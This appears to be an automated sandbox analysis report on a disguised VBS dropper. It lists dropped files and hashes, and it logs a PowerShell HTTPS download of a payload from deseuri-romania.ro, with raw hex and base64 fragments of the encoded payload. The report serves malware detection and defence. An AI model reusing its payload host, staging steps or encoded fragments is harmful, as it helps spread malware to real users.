                                    SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
                                    Malicious:false
                                    Reputation:moderate, very likely benign file
                                    Preview:@...e................................................@..........

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_egclhwgb.myd.ps1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_huoothud.2hk.psm1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rwyz3jwf.her.ps1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sy40rhyy.vfi.psm1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Roaming\Ghastily.Kri

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                    Category:dropped
                                    Size (bytes):437608
                                    Entropy (8bit):5.852166561840111
                                    Encrypted:false
                                    SSDEEP:6144:xy0c0FyoE2e1LjGTD/DQMqO4UHABAVI/57bgsiIl2vY1dtJwD/Zc6YwvB2q04jZO:xc0L0GTDL5qvLWWgsLNdC68v08A4sR5j
                                    MD5:87CB39DFE342DFF1EAAD4F98568D8AC2
                                    SHA1:01DECB2CE6352B9BC94819F25C2A2529F4F432F8
                                    SHA-256:250ED83843CA423C4FD9C6BC72B1A975DCDD8CCFD6327F5313B7852F6DD673A4
                                    SHA-512:2FA721A23FFFD36CDC7C5596038A8CECD67B40601CECC411788169A5B2844C10B339F7453A48CD31A70E3C2BED09687EED52E55A0641B2FC8EDF870F7C3B118B
                                    Malicious:false
                                    Preview:6wK+/HEBm7tNvRMA6wJH63EBmwNcJATrAhyi6wILCrmxCe8EcQGbcQGbgfGkbQpJ6wIqhOsCeeCB8RVk5U1xAZvrAuiH6wLOsOsC20K6FxWJ9XEBm3EBm+sC5VTrAjJGMcrrAqM8cQGbiRQLcQGb6wI5ENHi6wJKiusCOpaDwQTrAhQTcQGbgflz1U8DfMlxAZvrAibvi0QkBHEBm3EBm4nD6wK6enEBm4HD93q6AHEBm+sCDmu6ypW2BHEBm+sC/8iB8ggYHmTrAkff6wLZx4Hqwo2oYOsCVlrrAj26cQGb6wLvGXEBm3EBm4sMEOsCljBxAZuJDBNxAZtxAZtCcQGb6wJ6VYH64IsEAHXX6wK0GesC7EWJXCQM6wIbW3EBm4HtAAMAAOsCg4XrAmgmi1QkCHEBm+sCinmLfCQEcQGb6wKrO4nrcQGbcQGbgcOcAAAAcQGbcQGbU+sCyn5xAZtqQHEBm+sCEXGJ63EBm3EBm8eDAAEAAACgZgNxAZtxAZuBwwABAADrAuoWcQGbU+sC/vnrAkaRievrAt3QcQGbibsEAQAA6wKLAnEBm4HDBAEAAOsCOB5xAZtT6wLmLXEBm2r/cQGbcQGbg8IF6wKcDOsCL8kx9usCZHzrAixmMcnrAt3ucQGbixpxAZvrAhv0QXEBm3EBmzkcCnX0cQGbcQGbRusCHTJxAZuAfAr7uHXfcQGbcQGbi0QK/HEBm+sCnZop8OsC4JDrAiuT/9LrAreD6wJWILrgiwQA6wLm/XEBmzHA6wL47nEBm4t8JAxxAZvrAoCogTQHZeA9vXEBm+sCQ0aDwARxAZtxAZs50HXlcQGbcQGbiftxAZtxAZv/1+sCSA3rAivpjeM9vWWGuHxdOmZLpKK9QpdhxobwlRo0gGlwMdzRoSTyYcxaDEGxPJRMzfw/Yfw7mGaDlKlrcDEwadgEDCnevuQh4DeYAFs4tGHMqmOsiIS1Yfx6yLKTPJ7gdUNaJ3mwZcyv

                                    Static File Info

                                    General

                                    File type:ASCII text, with CRLF line terminators
                                    Entropy (8bit):5.0897597264876655
                                    TrID:
                                    • Visual Basic Script (13500/0) 100.00%
                                    File name:Szacunek IMP29575 za eksport z ostatniego kwartalu.vbs
                                    File size:156'919 bytes
                                    MD5:740d51a6d22d43f1b99e61c9d3366237
                                    SHA1:712c28e59ff11135e1957f86d8e6a995ad772de6
                                    SHA256:e301c6308fff6e0e1d3e399a2ad2eb623f2f36590ff60766d16efbe6f4c154dc
                                    SHA512:be9ca0b1f9f8a375b3cf0c8d93fb2458a23a5e3a4db2545c3b7eea4f1e33e5d7e4c8ead86976a4d0ee121d4a7ad4c33da18bfeeb4e3345e384e5f63f53902fa2
                                    SSDEEP:3072:aiHtveXendAy3yrLRKm+ay3tJuj8Sq2qb0M240PCOLvAtK3qfBHqn5r4f6:aiHtveXendAy3yrslay3tJuj8Sq2qb0Z
                                    TLSH:43E373D3CAD5AA989A955AB3DD1357370DB0026C37231F7443BEC98D605398889BFBC8
                                    File Content Preview:......Set Skovarbejde = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")....Set Forandringsprogrammer = Skovarbejde.ExecQuery("Select * from Win32_Process Where Name = 'cracking.exe'")....For Each bajonetlaasens in Forandringsprogramm

                                    File Icon

                                    Icon Hash:68d69b8f86ab9a86

                                    Network Behavior

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Oct 24, 2024 15:07:10.685431004 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:10.685461998 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:10.685574055 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:10.695858002 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:10.695871115 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:11.603245974 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:11.603347063 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:11.607064962 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:11.607079029 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:11.607383966 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:11.617750883 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:11.659332991 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:11.891422987 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:11.939091921 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.036277056 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.036289930 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.036320925 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.036333084 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.036358118 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.036427021 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.036427021 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.036442041 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.036595106 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.038382053 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.038397074 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.038552046 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.038562059 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.038625956 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.183765888 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.183784962 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.183906078 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.183916092 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.184055090 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.184783936 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.184801102 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.184875011 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.184884071 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.184943914 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.186353922 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.186369896 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.186460972 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.186471939 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.186543941 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.197942972 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.197962999 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.198183060 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.198195934 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.198355913 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.331491947 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.331518888 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.331615925 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.331629992 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.331672907 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.332325935 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.332345009 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.332547903 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.332552910 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.332611084 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.333192110 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.333213091 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.333287001 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.333292961 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.333339930 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.336827040 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.336847067 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.336918116 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.336926937 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.336983919 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.337719917 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.337739944 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.337791920 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.337799072 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.337832928 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.337866068 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.338032961 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.338051081 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.338113070 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.338119984 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.338162899 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.478255987 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.478276014 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.478411913 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.478426933 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.478496075 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.478583097 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.478598118 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.478693008 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.478699923 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.478754997 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.479022980 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.479037046 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.479115009 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.479120970 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.479168892 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.479895115 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.479908943 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.479975939 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.479983091 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.480057001 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.480580091 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.480596066 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.480664015 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.480669022 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.480714083 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.481225967 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.481240034 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.481301069 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.481306076 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.481357098 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.481640100 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.481654882 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.481723070 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.481726885 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.481771946 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.482141018 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.482155085 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.482218981 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.482223034 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.482264996 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.482592106 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.482606888 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.482665062 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.482670069 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.482707024 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.482975006 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.482989073 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.483038902 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.483043909 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.483082056 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.483092070 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.484046936 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.484061956 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.484129906 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.484137058 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.484175920 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.484179020 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.484186888 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.484205008 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.484237909 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.484244108 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.484271049 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.484294891 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.484561920 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.484575033 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.484627962 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.484633923 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.484672070 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.484821081 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.484833956 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.484891891 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.484898090 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.484934092 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.595875978 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.595932007 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.596007109 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.596088886 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.598442078 CEST49737443192.168.2.11188.241.183.203

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Oct 24, 2024 15:07:07.985125065 CEST5702553192.168.2.111.1.1.1
                                    Oct 24, 2024 15:07:07.993021965 CEST53570251.1.1.1192.168.2.11
                                    Oct 24, 2024 15:07:10.606014967 CEST6111553192.168.2.111.1.1.1
                                    Oct 24, 2024 15:07:10.677639961 CEST53611151.1.1.1192.168.2.11

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Oct 24, 2024 15:07:07.985125065 CEST192.168.2.111.1.1.10xe3b1Standard query (0)Horm5zl_6637.6637.6637.657eA (IP address)IN (0x0001)false
                                    Oct 24, 2024 15:07:10.606014967 CEST192.168.2.111.1.1.10xa6c1Standard query (0)deseuri-romania.roA (IP address)IN (0x0001)false

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Oct 24, 2024 15:07:03.926285028 CEST1.1.1.1192.168.2.110xee41No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.netazurefd-t-fb-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                    Oct 24, 2024 15:07:03.926285028 CEST1.1.1.1192.168.2.110xee41No error (0)dual.s-part-0017.t-0009.fb-t-msedge.nets-part-0017.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                    Oct 24, 2024 15:07:03.926285028 CEST1.1.1.1192.168.2.110xee41No error (0)s-part-0017.t-0009.fb-t-msedge.net13.107.253.45A (IP address)IN (0x0001)false
                                    Oct 24, 2024 15:07:07.993021965 CEST1.1.1.1192.168.2.110xe3b1Name error (3)Horm5zl_6637.6637.6637.657enonenoneA (IP address)IN (0x0001)false
                                    Oct 24, 2024 15:07:10.677639961 CEST1.1.1.1192.168.2.110xa6c1No error (0)deseuri-romania.ro188.241.183.203A (IP address)IN (0x0001)false

                                    HTTP Request Dependency Graph

                                    • deseuri-romania.ro

                                    HTTPS Proxied Packets

                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.1149737188.241.183.2034437608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    TimestampBytes transferredDirectionData
                                    2024-10-24 13:07:11 UTC176OUTGET /Bennington.jpb HTTP/1.1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                    Host: deseuri-romania.ro
                                    Connection: Keep-Alive
                                    2024-10-24 13:07:11 UTC404INHTTP/1.1 200 OK
                                    Connection: close
                                    content-type: application/octet-stream
                                    last-modified: Thu, 24 Oct 2024 10:25:02 GMT
                                    accept-ranges: bytes
                                    content-length: 437608
                                    date: Thu, 24 Oct 2024 13:07:11 GMT
                                    server: LiteSpeed
                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                    2024-10-24 13:07:12 UTC16384INData Raw: 36 77 4b 2b 2f 48 45 42 6d 37 74 4e 76 52 4d 41 36 77 4a 48 36 33 45 42 6d 77 4e 63 4a 41 54 72 41 68 79 69 36 77 49 4c 43 72 6d 78 43 65 38 45 63 51 47 62 63 51 47 62 67 66 47 6b 62 51 70 4a 36 77 49 71 68 4f 73 43 65 65 43 42 38 52 56 6b 35 55 31 78 41 5a 76 72 41 75 69 48 36 77 4c 4f 73 4f 73 43 32 30 4b 36 46 78 57 4a 39 58 45 42 6d 33 45 42 6d 2b 73 43 35 56 54 72 41 6a 4a 47 4d 63 72 72 41 71 4d 38 63 51 47 62 69 52 51 4c 63 51 47 62 36 77 49 35 45 4e 48 69 36 77 4a 4b 69 75 73 43 4f 70 61 44 77 51 54 72 41 68 51 54 63 51 47 62 67 66 6c 7a 31 55 38 44 66 4d 6c 78 41 5a 76 72 41 69 62 76 69 30 51 6b 42 48 45 42 6d 33 45 42 6d 34 6e 44 36 77 4b 36 65 6e 45 42 6d 34 48 44 39 33 71 36 41 48 45 42 6d 2b 73 43 44 6d 75 36 79 70 57 32 42 48 45 42 6d 2b 73
                                    Data Ascii: 6wK+/HEBm7tNvRMA6wJH63EBmwNcJATrAhyi6wILCrmxCe8EcQGbcQGbgfGkbQpJ6wIqhOsCeeCB8RVk5U1xAZvrAuiH6wLOsOsC20K6FxWJ9XEBm3EBm+sC5VTrAjJGMcrrAqM8cQGbiRQLcQGb6wI5ENHi6wJKiusCOpaDwQTrAhQTcQGbgflz1U8DfMlxAZvrAibvi0QkBHEBm3EBm4nD6wK6enEBm4HD93q6AHEBm+sCDmu6ypW2BHEBm+s
                                    2024-10-24 13:07:12 UTC16384INData Raw: 47 6e 4f 35 5a 57 6c 74 75 65 36 74 49 58 46 74 4c 33 6f 70 64 50 2f 68 69 32 55 78 62 38 5a 66 55 6f 79 6f 63 50 4f 64 6f 6b 55 63 78 4e 39 4d 48 45 74 44 45 33 33 4d 42 36 70 69 73 4e 71 4e 6c 6a 4b 35 5a 62 4f 47 52 77 30 6e 55 6a 79 57 32 31 44 38 50 6d 48 4f 6b 62 50 66 62 54 79 4f 65 64 73 46 41 57 6b 47 6e 64 71 78 47 76 6b 52 53 63 46 4e 5a 39 67 51 61 72 36 7a 66 51 48 34 65 75 76 6d 4d 31 36 4f 4a 42 4f 4e 76 45 73 49 30 52 65 68 35 42 62 32 5a 57 43 39 76 46 4d 74 32 68 75 6d 35 43 59 4f 64 71 6b 4f 62 43 48 73 41 54 79 4d 2b 4e 6a 39 79 6d 34 33 6f 38 35 33 66 4f 44 54 75 4b 57 32 55 38 6c 34 30 4a 55 6b 4a 76 6f 48 58 39 77 6c 76 76 42 41 42 33 35 6f 35 62 5a 6c 35 47 35 62 4f 4c 2b 35 76 4d 41 52 52 73 47 39 5a 65 2b 35 59 76 58 67 50 65 4f
                                    Data Ascii: GnO5ZWltue6tIXFtL3opdP/hi2Uxb8ZfUoyocPOdokUcxN9MHEtDE33MB6pisNqNljK5ZbOGRw0nUjyW21D8PmHOkbPfbTyOedsFAWkGndqxGvkRScFNZ9gQar6zfQH4euvmM16OJBONvEsI0Reh5Bb2ZWC9vFMt2hum5CYOdqkObCHsATyM+Nj9ym43o853fODTuKW2U8l40JUkJvoHX9wlvvBAB35o5bZl5G5bOL+5vMARRsG9Ze+5YvXgPeO
                                    2024-10-24 13:07:12 UTC16384INData Raw: 49 6d 38 32 38 48 4d 38 76 57 55 73 4b 64 72 65 6e 68 46 51 45 53 4c 6b 65 5a 2b 32 30 76 57 65 52 52 77 6f 77 70 66 61 6f 74 39 78 45 49 69 32 70 74 55 73 66 4f 51 39 37 64 31 32 32 54 70 70 35 53 54 78 37 68 59 51 58 50 76 79 50 6a 52 64 4c 65 50 5a 64 49 4a 5a 55 47 48 4f 69 36 70 58 33 74 4e 36 36 76 4b 75 37 4d 39 43 54 64 53 4f 51 37 33 6d 32 42 65 56 35 54 5a 62 68 6a 48 4a 68 4c 78 4f 45 2b 33 41 56 75 51 54 49 42 4b 70 33 37 78 2b 48 4d 50 34 70 4f 51 6a 32 55 7a 34 31 62 53 32 55 42 4b 54 70 54 66 76 46 2b 50 4d 32 2f 4f 71 49 53 70 72 6f 75 55 71 6e 4c 44 78 66 45 39 35 6c 7a 61 74 72 6a 48 78 76 76 4d 39 75 2f 53 73 4d 76 66 77 35 75 78 64 30 4c 78 6c 34 49 4b 56 69 6d 36 75 63 62 30 4a 45 2f 6c 34 31 76 41 30 70 44 38 45 76 43 50 4b 57 33 4d
